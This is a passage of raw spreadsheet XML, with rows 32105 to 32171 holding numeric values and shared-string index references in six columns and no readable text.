    <row r="32105" ht="15.75" customHeight="1">
      <c r="A32105" s="1">
        <v>6426.0</v>
      </c>
      <c r="B32105" s="2">
        <v>4.8557666E7</v>
      </c>
      <c r="C32105" s="2" t="s">
        <v>30888</v>
      </c>
      <c r="D32105" s="2">
        <v>1.0</v>
      </c>
      <c r="E32105" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32105" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32106" ht="15.75" customHeight="1">
      <c r="A32106" s="1">
        <v>6514.0</v>
      </c>
      <c r="B32106" s="2">
        <v>4.8777631E7</v>
      </c>
      <c r="C32106" s="2" t="s">
        <v>30889</v>
      </c>
      <c r="D32106" s="2">
        <v>1.0</v>
      </c>
      <c r="E32106" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32106" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32107" ht="15.75" customHeight="1">
      <c r="A32107" s="1">
        <v>7084.0</v>
      </c>
      <c r="B32107" s="2">
        <v>5.028312E7</v>
      </c>
      <c r="C32107" s="2" t="s">
        <v>30890</v>
      </c>
      <c r="D32107" s="2">
        <v>1.0</v>
      </c>
      <c r="E32107" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32107" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32108" ht="15.75" customHeight="1">
      <c r="A32108" s="1">
        <v>7156.0</v>
      </c>
      <c r="B32108" s="2">
        <v>5.0480139E7</v>
      </c>
      <c r="C32108" s="2" t="s">
        <v>30891</v>
      </c>
      <c r="D32108" s="2">
        <v>1.0</v>
      </c>
      <c r="E32108" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32108" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32109" ht="15.75" customHeight="1">
      <c r="A32109" s="1">
        <v>7800.0</v>
      </c>
      <c r="B32109" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C32109" s="2" t="s">
        <v>30892</v>
      </c>
      <c r="D32109" s="2">
        <v>1.0</v>
      </c>
      <c r="E32109" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32109" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32110" ht="15.75" customHeight="1">
      <c r="A32110" s="1">
        <v>7854.0</v>
      </c>
      <c r="B32110" s="2">
        <v>5.2356115E7</v>
      </c>
      <c r="C32110" s="2" t="s">
        <v>30893</v>
      </c>
      <c r="D32110" s="2">
        <v>1.0</v>
      </c>
      <c r="E32110" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32110" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32111" ht="15.75" customHeight="1">
      <c r="A32111" s="1">
        <v>8080.0</v>
      </c>
      <c r="B32111" s="2">
        <v>5.3023019E7</v>
      </c>
      <c r="C32111" s="2" t="s">
        <v>30894</v>
      </c>
      <c r="D32111" s="2">
        <v>1.0</v>
      </c>
      <c r="E32111" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32111" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32112" ht="15.75" customHeight="1">
      <c r="A32112" s="1">
        <v>8426.0</v>
      </c>
      <c r="B32112" s="2">
        <v>5.392953E7</v>
      </c>
      <c r="C32112" s="2" t="s">
        <v>30895</v>
      </c>
      <c r="D32112" s="2">
        <v>1.0</v>
      </c>
      <c r="E32112" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32112" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32113" ht="15.75" customHeight="1">
      <c r="A32113" s="1">
        <v>8456.0</v>
      </c>
      <c r="B32113" s="2">
        <v>5.3986589E7</v>
      </c>
      <c r="C32113" s="2" t="s">
        <v>30896</v>
      </c>
      <c r="D32113" s="2">
        <v>1.0</v>
      </c>
      <c r="E32113" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32113" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32114" ht="15.75" customHeight="1">
      <c r="A32114" s="1">
        <v>8757.0</v>
      </c>
      <c r="B32114" s="2">
        <v>5.4568431E7</v>
      </c>
      <c r="C32114" s="2" t="s">
        <v>30897</v>
      </c>
      <c r="D32114" s="2">
        <v>1.0</v>
      </c>
      <c r="E32114" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32114" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32115" ht="15.75" customHeight="1">
      <c r="A32115" s="1">
        <v>8807.0</v>
      </c>
      <c r="B32115" s="2">
        <v>5.4615071E7</v>
      </c>
      <c r="C32115" s="2" t="s">
        <v>30898</v>
      </c>
      <c r="D32115" s="2">
        <v>1.0</v>
      </c>
      <c r="E32115" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32115" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32116" ht="15.75" customHeight="1">
      <c r="A32116" s="1">
        <v>8829.0</v>
      </c>
      <c r="B32116" s="2">
        <v>5.4651189E7</v>
      </c>
      <c r="C32116" s="2" t="s">
        <v>30899</v>
      </c>
      <c r="D32116" s="2">
        <v>1.0</v>
      </c>
      <c r="E32116" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32116" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32117" ht="15.75" customHeight="1">
      <c r="A32117" s="1">
        <v>8844.0</v>
      </c>
      <c r="B32117" s="2">
        <v>5.4723792E7</v>
      </c>
      <c r="C32117" s="2" t="s">
        <v>30900</v>
      </c>
      <c r="D32117" s="2">
        <v>1.0</v>
      </c>
      <c r="E32117" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32117" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32118" ht="15.75" customHeight="1">
      <c r="A32118" s="1">
        <v>8896.0</v>
      </c>
      <c r="B32118" s="2">
        <v>5.4794797E7</v>
      </c>
      <c r="C32118" s="2" t="s">
        <v>30901</v>
      </c>
      <c r="D32118" s="2">
        <v>1.0</v>
      </c>
      <c r="E32118" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32118" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32119" ht="15.75" customHeight="1">
      <c r="A32119" s="1">
        <v>9165.0</v>
      </c>
      <c r="B32119" s="2">
        <v>5.5308995E7</v>
      </c>
      <c r="C32119" s="2" t="s">
        <v>30902</v>
      </c>
      <c r="D32119" s="2">
        <v>1.0</v>
      </c>
      <c r="E32119" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32119" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32120" ht="15.75" customHeight="1">
      <c r="A32120" s="1">
        <v>9257.0</v>
      </c>
      <c r="B32120" s="2">
        <v>5.5478011E7</v>
      </c>
      <c r="C32120" s="2" t="s">
        <v>30903</v>
      </c>
      <c r="D32120" s="2">
        <v>1.0</v>
      </c>
      <c r="E32120" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32120" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32121" ht="15.75" customHeight="1">
      <c r="A32121" s="1">
        <v>9291.0</v>
      </c>
      <c r="B32121" s="2">
        <v>5.5550335E7</v>
      </c>
      <c r="C32121" s="2" t="s">
        <v>30904</v>
      </c>
      <c r="D32121" s="2">
        <v>1.0</v>
      </c>
      <c r="E32121" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32121" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32122" ht="15.75" customHeight="1">
      <c r="A32122" s="1">
        <v>9356.0</v>
      </c>
      <c r="B32122" s="2">
        <v>5.5678021E7</v>
      </c>
      <c r="C32122" s="2" t="s">
        <v>30905</v>
      </c>
      <c r="D32122" s="2">
        <v>1.0</v>
      </c>
      <c r="E32122" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32122" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32123" ht="15.75" customHeight="1">
      <c r="A32123" s="1">
        <v>9464.0</v>
      </c>
      <c r="B32123" s="2">
        <v>5.585532E7</v>
      </c>
      <c r="C32123" s="2" t="s">
        <v>30906</v>
      </c>
      <c r="D32123" s="2">
        <v>1.0</v>
      </c>
      <c r="E32123" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32123" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32124" ht="15.75" customHeight="1">
      <c r="A32124" s="1">
        <v>9683.0</v>
      </c>
      <c r="B32124" s="2">
        <v>5.6332237E7</v>
      </c>
      <c r="C32124" s="2" t="s">
        <v>30907</v>
      </c>
      <c r="D32124" s="2">
        <v>1.0</v>
      </c>
      <c r="E32124" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32124" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32125" ht="15.75" customHeight="1">
      <c r="A32125" s="1">
        <v>9926.0</v>
      </c>
      <c r="B32125" s="2">
        <v>5.6830851E7</v>
      </c>
      <c r="C32125" s="2" t="s">
        <v>30908</v>
      </c>
      <c r="D32125" s="2">
        <v>1.0</v>
      </c>
      <c r="E32125" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32125" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32126" ht="15.75" customHeight="1">
      <c r="A32126" s="1">
        <v>10258.0</v>
      </c>
      <c r="B32126" s="2">
        <v>5.7561557E7</v>
      </c>
      <c r="C32126" s="2" t="s">
        <v>30909</v>
      </c>
      <c r="D32126" s="2">
        <v>1.0</v>
      </c>
      <c r="E32126" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32126" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32127" ht="15.75" customHeight="1">
      <c r="A32127" s="1">
        <v>10696.0</v>
      </c>
      <c r="B32127" s="2">
        <v>1.4788123E7</v>
      </c>
      <c r="C32127" s="2" t="s">
        <v>30910</v>
      </c>
      <c r="D32127" s="2">
        <v>1.0</v>
      </c>
      <c r="E32127" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32127" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32128" ht="15.75" customHeight="1">
      <c r="A32128" s="1">
        <v>11278.0</v>
      </c>
      <c r="B32128" s="2">
        <v>2.0781792E7</v>
      </c>
      <c r="C32128" s="2" t="s">
        <v>30911</v>
      </c>
      <c r="D32128" s="2">
        <v>1.0</v>
      </c>
      <c r="E32128" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32128" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32129" ht="15.75" customHeight="1">
      <c r="A32129" s="1">
        <v>11306.0</v>
      </c>
      <c r="B32129" s="2">
        <v>2.0996382E7</v>
      </c>
      <c r="C32129" s="2" t="s">
        <v>30912</v>
      </c>
      <c r="D32129" s="2">
        <v>1.0</v>
      </c>
      <c r="E32129" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32129" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32130" ht="15.75" customHeight="1">
      <c r="A32130" s="1">
        <v>11319.0</v>
      </c>
      <c r="B32130" s="2">
        <v>2.1078442E7</v>
      </c>
      <c r="C32130" s="2" t="s">
        <v>30913</v>
      </c>
      <c r="D32130" s="2">
        <v>1.0</v>
      </c>
      <c r="E32130" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32130" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32131" ht="15.75" customHeight="1">
      <c r="A32131" s="1">
        <v>11422.0</v>
      </c>
      <c r="B32131" s="2">
        <v>2.1697408E7</v>
      </c>
      <c r="C32131" s="2" t="s">
        <v>30914</v>
      </c>
      <c r="D32131" s="2">
        <v>1.0</v>
      </c>
      <c r="E32131" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32131" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32132" ht="15.75" customHeight="1">
      <c r="A32132" s="1">
        <v>12039.0</v>
      </c>
      <c r="B32132" s="2">
        <v>2.6304869E7</v>
      </c>
      <c r="C32132" s="2" t="s">
        <v>30915</v>
      </c>
      <c r="D32132" s="2">
        <v>1.0</v>
      </c>
      <c r="E32132" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32132" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32133" ht="15.75" customHeight="1">
      <c r="A32133" s="1">
        <v>12043.0</v>
      </c>
      <c r="B32133" s="2">
        <v>2.6330648E7</v>
      </c>
      <c r="C32133" s="2" t="s">
        <v>30916</v>
      </c>
      <c r="D32133" s="2">
        <v>1.0</v>
      </c>
      <c r="E32133" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32133" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32134" ht="15.75" customHeight="1">
      <c r="A32134" s="1">
        <v>12077.0</v>
      </c>
      <c r="B32134" s="2">
        <v>2.666567E7</v>
      </c>
      <c r="C32134" s="2" t="s">
        <v>30917</v>
      </c>
      <c r="D32134" s="2">
        <v>1.0</v>
      </c>
      <c r="E32134" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32134" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32135" ht="15.75" customHeight="1">
      <c r="A32135" s="1">
        <v>12106.0</v>
      </c>
      <c r="B32135" s="2">
        <v>2.6802248E7</v>
      </c>
      <c r="C32135" s="2" t="s">
        <v>30918</v>
      </c>
      <c r="D32135" s="2">
        <v>1.0</v>
      </c>
      <c r="E32135" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32135" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32136" ht="15.75" customHeight="1">
      <c r="A32136" s="1">
        <v>12184.0</v>
      </c>
      <c r="B32136" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C32136" s="2" t="s">
        <v>30919</v>
      </c>
      <c r="D32136" s="2">
        <v>1.0</v>
      </c>
      <c r="E32136" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32136" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32137" ht="15.75" customHeight="1">
      <c r="A32137" s="1">
        <v>12718.0</v>
      </c>
      <c r="B32137" s="2">
        <v>3.0868136E7</v>
      </c>
      <c r="C32137" s="2" t="s">
        <v>30920</v>
      </c>
      <c r="D32137" s="2">
        <v>1.0</v>
      </c>
      <c r="E32137" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32137" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32138" ht="15.75" customHeight="1">
      <c r="A32138" s="1">
        <v>12744.0</v>
      </c>
      <c r="B32138" s="2">
        <v>3.1088355E7</v>
      </c>
      <c r="C32138" s="2" t="s">
        <v>30921</v>
      </c>
      <c r="D32138" s="2">
        <v>1.0</v>
      </c>
      <c r="E32138" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32138" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32139" ht="15.75" customHeight="1">
      <c r="A32139" s="1">
        <v>12822.0</v>
      </c>
      <c r="B32139" s="2">
        <v>3.1622109E7</v>
      </c>
      <c r="C32139" s="2" t="s">
        <v>30922</v>
      </c>
      <c r="D32139" s="2">
        <v>1.0</v>
      </c>
      <c r="E32139" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32139" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32140" ht="15.75" customHeight="1">
      <c r="A32140" s="1">
        <v>12865.0</v>
      </c>
      <c r="B32140" s="2">
        <v>3.1881873E7</v>
      </c>
      <c r="C32140" s="2" t="s">
        <v>30923</v>
      </c>
      <c r="D32140" s="2">
        <v>1.0</v>
      </c>
      <c r="E32140" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32140" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32141" ht="15.75" customHeight="1">
      <c r="A32141" s="1">
        <v>12878.0</v>
      </c>
      <c r="B32141" s="2">
        <v>3.1977162E7</v>
      </c>
      <c r="C32141" s="2" t="s">
        <v>30924</v>
      </c>
      <c r="D32141" s="2">
        <v>1.0</v>
      </c>
      <c r="E32141" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32141" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32142" ht="15.75" customHeight="1">
      <c r="A32142" s="1">
        <v>13265.0</v>
      </c>
      <c r="B32142" s="2">
        <v>3.4349185E7</v>
      </c>
      <c r="C32142" s="2" t="s">
        <v>30925</v>
      </c>
      <c r="D32142" s="2">
        <v>1.0</v>
      </c>
      <c r="E32142" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32142" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32143" ht="15.75" customHeight="1">
      <c r="A32143" s="1">
        <v>13288.0</v>
      </c>
      <c r="B32143" s="2">
        <v>3.4431437E7</v>
      </c>
      <c r="C32143" s="2" t="s">
        <v>30926</v>
      </c>
      <c r="D32143" s="2">
        <v>1.0</v>
      </c>
      <c r="E32143" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32143" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32144" ht="15.75" customHeight="1">
      <c r="A32144" s="1">
        <v>13481.0</v>
      </c>
      <c r="B32144" s="2">
        <v>3.5334813E7</v>
      </c>
      <c r="C32144" s="2" t="s">
        <v>30927</v>
      </c>
      <c r="D32144" s="2">
        <v>1.0</v>
      </c>
      <c r="E32144" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32144" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32145" ht="15.75" customHeight="1">
      <c r="A32145" s="1">
        <v>13489.0</v>
      </c>
      <c r="B32145" s="2">
        <v>3.5393593E7</v>
      </c>
      <c r="C32145" s="2" t="s">
        <v>30928</v>
      </c>
      <c r="D32145" s="2">
        <v>1.0</v>
      </c>
      <c r="E32145" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32145" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32146" ht="15.75" customHeight="1">
      <c r="A32146" s="1">
        <v>13626.0</v>
      </c>
      <c r="B32146" s="2">
        <v>3.5886011E7</v>
      </c>
      <c r="C32146" s="2" t="s">
        <v>30929</v>
      </c>
      <c r="D32146" s="2">
        <v>1.0</v>
      </c>
      <c r="E32146" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32146" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32147" ht="15.75" customHeight="1">
      <c r="A32147" s="1">
        <v>13709.0</v>
      </c>
      <c r="B32147" s="2">
        <v>3.6218191E7</v>
      </c>
      <c r="C32147" s="2" t="s">
        <v>30930</v>
      </c>
      <c r="D32147" s="2">
        <v>1.0</v>
      </c>
      <c r="E32147" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32147" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32148" ht="15.75" customHeight="1">
      <c r="A32148" s="1">
        <v>14548.0</v>
      </c>
      <c r="B32148" s="2">
        <v>3.994085E7</v>
      </c>
      <c r="C32148" s="2" t="s">
        <v>30931</v>
      </c>
      <c r="D32148" s="2">
        <v>1.0</v>
      </c>
      <c r="E32148" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32148" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32149" ht="15.75" customHeight="1">
      <c r="A32149" s="1">
        <v>14563.0</v>
      </c>
      <c r="B32149" s="2">
        <v>4.0052279E7</v>
      </c>
      <c r="C32149" s="2" t="s">
        <v>30932</v>
      </c>
      <c r="D32149" s="2">
        <v>1.0</v>
      </c>
      <c r="E32149" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32149" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32150" ht="15.75" customHeight="1">
      <c r="A32150" s="1">
        <v>14934.0</v>
      </c>
      <c r="B32150" s="2">
        <v>4.1240706E7</v>
      </c>
      <c r="C32150" s="2" t="s">
        <v>30933</v>
      </c>
      <c r="D32150" s="2">
        <v>1.0</v>
      </c>
      <c r="E32150" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32150" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32151" ht="15.75" customHeight="1">
      <c r="A32151" s="1">
        <v>15296.0</v>
      </c>
      <c r="B32151" s="2">
        <v>4.2435341E7</v>
      </c>
      <c r="C32151" s="2" t="s">
        <v>30934</v>
      </c>
      <c r="D32151" s="2">
        <v>1.0</v>
      </c>
      <c r="E32151" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32151" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32152" ht="15.75" customHeight="1">
      <c r="A32152" s="1">
        <v>15601.0</v>
      </c>
      <c r="B32152" s="2">
        <v>4.3484994E7</v>
      </c>
      <c r="C32152" s="2" t="s">
        <v>30935</v>
      </c>
      <c r="D32152" s="2">
        <v>1.0</v>
      </c>
      <c r="E32152" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32152" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32153" ht="15.75" customHeight="1">
      <c r="A32153" s="1">
        <v>16099.0</v>
      </c>
      <c r="B32153" s="2">
        <v>4.5395589E7</v>
      </c>
      <c r="C32153" s="2" t="s">
        <v>30936</v>
      </c>
      <c r="D32153" s="2">
        <v>1.0</v>
      </c>
      <c r="E32153" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32153" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32154" ht="15.75" customHeight="1">
      <c r="A32154" s="1">
        <v>16211.0</v>
      </c>
      <c r="B32154" s="2">
        <v>4.5698996E7</v>
      </c>
      <c r="C32154" s="2" t="s">
        <v>30937</v>
      </c>
      <c r="D32154" s="2">
        <v>1.0</v>
      </c>
      <c r="E32154" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32154" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32155" ht="15.75" customHeight="1">
      <c r="A32155" s="1">
        <v>16334.0</v>
      </c>
      <c r="B32155" s="2">
        <v>4.6044796E7</v>
      </c>
      <c r="C32155" s="2" t="s">
        <v>30938</v>
      </c>
      <c r="D32155" s="2">
        <v>1.0</v>
      </c>
      <c r="E32155" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32155" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32156" ht="15.75" customHeight="1">
      <c r="A32156" s="1">
        <v>16413.0</v>
      </c>
      <c r="B32156" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C32156" s="2" t="s">
        <v>30939</v>
      </c>
      <c r="D32156" s="2">
        <v>1.0</v>
      </c>
      <c r="E32156" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32156" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32157" ht="15.75" customHeight="1">
      <c r="A32157" s="1">
        <v>16605.0</v>
      </c>
      <c r="B32157" s="2">
        <v>4.7043749E7</v>
      </c>
      <c r="C32157" s="2" t="s">
        <v>30940</v>
      </c>
      <c r="D32157" s="2">
        <v>1.0</v>
      </c>
      <c r="E32157" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32157" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32158" ht="15.75" customHeight="1">
      <c r="A32158" s="1">
        <v>16701.0</v>
      </c>
      <c r="B32158" s="2">
        <v>4.7396871E7</v>
      </c>
      <c r="C32158" s="2" t="s">
        <v>30941</v>
      </c>
      <c r="D32158" s="2">
        <v>1.0</v>
      </c>
      <c r="E32158" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32158" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32159" ht="15.75" customHeight="1">
      <c r="A32159" s="1">
        <v>16819.0</v>
      </c>
      <c r="B32159" s="2">
        <v>4.7836312E7</v>
      </c>
      <c r="C32159" s="2" t="s">
        <v>30942</v>
      </c>
      <c r="D32159" s="2">
        <v>1.0</v>
      </c>
      <c r="E32159" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32159" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32160" ht="15.75" customHeight="1">
      <c r="A32160" s="1">
        <v>16860.0</v>
      </c>
      <c r="B32160" s="2">
        <v>4.7938813E7</v>
      </c>
      <c r="C32160" s="2" t="s">
        <v>30943</v>
      </c>
      <c r="D32160" s="2">
        <v>1.0</v>
      </c>
      <c r="E32160" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32160" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32161" ht="15.75" customHeight="1">
      <c r="A32161" s="1">
        <v>16951.0</v>
      </c>
      <c r="B32161" s="2">
        <v>4.8234752E7</v>
      </c>
      <c r="C32161" s="2" t="s">
        <v>30944</v>
      </c>
      <c r="D32161" s="2">
        <v>1.0</v>
      </c>
      <c r="E32161" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32161" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32162" ht="15.75" customHeight="1">
      <c r="A32162" s="1">
        <v>17112.0</v>
      </c>
      <c r="B32162" s="2">
        <v>4.8753262E7</v>
      </c>
      <c r="C32162" s="2" t="s">
        <v>30945</v>
      </c>
      <c r="D32162" s="2">
        <v>1.0</v>
      </c>
      <c r="E32162" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32162" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32163" ht="15.75" customHeight="1">
      <c r="A32163" s="1">
        <v>17804.0</v>
      </c>
      <c r="B32163" s="2">
        <v>5.0819544E7</v>
      </c>
      <c r="C32163" s="2" t="s">
        <v>30946</v>
      </c>
      <c r="D32163" s="2">
        <v>1.0</v>
      </c>
      <c r="E32163" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32163" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32164" ht="15.75" customHeight="1">
      <c r="A32164" s="1">
        <v>18169.0</v>
      </c>
      <c r="B32164" s="2">
        <v>5.1930325E7</v>
      </c>
      <c r="C32164" s="2" t="s">
        <v>30947</v>
      </c>
      <c r="D32164" s="2">
        <v>1.0</v>
      </c>
      <c r="E32164" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32164" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32165" ht="15.75" customHeight="1">
      <c r="A32165" s="1">
        <v>18412.0</v>
      </c>
      <c r="B32165" s="2">
        <v>5.2683087E7</v>
      </c>
      <c r="C32165" s="2" t="s">
        <v>30948</v>
      </c>
      <c r="D32165" s="2">
        <v>1.0</v>
      </c>
      <c r="E32165" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32165" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32166" ht="15.75" customHeight="1">
      <c r="A32166" s="1">
        <v>18964.0</v>
      </c>
      <c r="B32166" s="2">
        <v>5.4356442E7</v>
      </c>
      <c r="C32166" s="2" t="s">
        <v>30949</v>
      </c>
      <c r="D32166" s="2">
        <v>1.0</v>
      </c>
      <c r="E32166" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32166" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32167" ht="15.75" customHeight="1">
      <c r="A32167" s="1">
        <v>19236.0</v>
      </c>
      <c r="B32167" s="2">
        <v>5.5075198E7</v>
      </c>
      <c r="C32167" s="2" t="s">
        <v>30950</v>
      </c>
      <c r="D32167" s="2">
        <v>1.0</v>
      </c>
      <c r="E32167" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32167" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32168" ht="15.75" customHeight="1">
      <c r="A32168" s="1">
        <v>19237.0</v>
      </c>
      <c r="B32168" s="2">
        <v>5.5076815E7</v>
      </c>
      <c r="C32168" s="2" t="s">
        <v>30951</v>
      </c>
      <c r="D32168" s="2">
        <v>1.0</v>
      </c>
      <c r="E32168" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32168" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32169" ht="15.75" customHeight="1">
      <c r="A32169" s="1">
        <v>19383.0</v>
      </c>
      <c r="B32169" s="2">
        <v>5.550493E7</v>
      </c>
      <c r="C32169" s="2" t="s">
        <v>30952</v>
      </c>
      <c r="D32169" s="2">
        <v>1.0</v>
      </c>
      <c r="E32169" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32169" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32170" ht="15.75" customHeight="1">
      <c r="A32170" s="1">
        <v>19387.0</v>
      </c>
      <c r="B32170" s="2">
        <v>5.551259E7</v>
      </c>
      <c r="C32170" s="2" t="s">
        <v>30953</v>
      </c>
      <c r="D32170" s="2">
        <v>1.0</v>
      </c>
      <c r="E32170" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32170" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="32171" ht="15.75" customHeight="1">
      <c r="A32171" s="1">
        <v>19475.0</v>
      </c>
      <c r="B32171" s="2">
        <v>5.5835228E7</v>
      </c>
      <c r="C32171" s="2" t="s">
        <v>30954</v>
      </c>
      <c r="D32171" s="2">
        <v>1.0</v>
      </c>
      <c r="E32171" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32171" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
